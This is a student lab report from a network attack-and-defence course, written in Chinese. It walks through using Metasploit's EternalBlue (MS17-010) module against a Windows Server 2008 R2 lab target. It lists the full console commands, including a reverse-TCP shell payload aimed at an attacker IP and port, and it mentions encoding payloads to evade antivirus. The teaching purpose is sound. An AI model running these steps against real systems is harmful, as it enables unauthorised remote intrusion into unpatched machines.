2018-2019-2 网络对抗技术 20165227 Exp5 MSF基础应用
Exploit选取
- 主动攻击:ms17_010_eternalblue
课上问题思考
- Exploit:网上的解释是Exploit 的英文意思为利用,它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用),有Exploit就肯定有漏洞。我自己的理解是一种攻击模块。
- Payload:字面意思 “有效载荷,有效负荷,有效载重”。对于程序员来说就是在程序中起关键作用的代码。
- Encode:对payload进行一定程度的编码,从而使之达到免杀的程度
实验步骤
实验一:使用ms17_010_eternalblue进行主动攻击(靶机:Windows Server 2008 R2 (x64) )
首先进入msf的模块目录下,查看可用的exploit
- 进入msfconsole,查看适用的靶机系统版本以及需要设置的参数项等相关信息
- 使用该模块,进行设置(靶机IP:192.168.245.134; 攻击机IP:192.168.245.132)
use exploit/windows/smb/ms17_010_eternalblue.rb //使用该模块
show payloads //查看载荷
set payload generic/shell_reverse_tcp //使用tcp反弹连接
set LHOST 192.168.245.132 //设置攻击机的IP,即KALI的IP地址
set LPORT 5227 //设置攻击端口
set RHOST 192.168.245.134 //设置靶机IP
set target 0 //选择自动目标系统类型
- 使用
exploit
进行监听攻击 - 攻击成功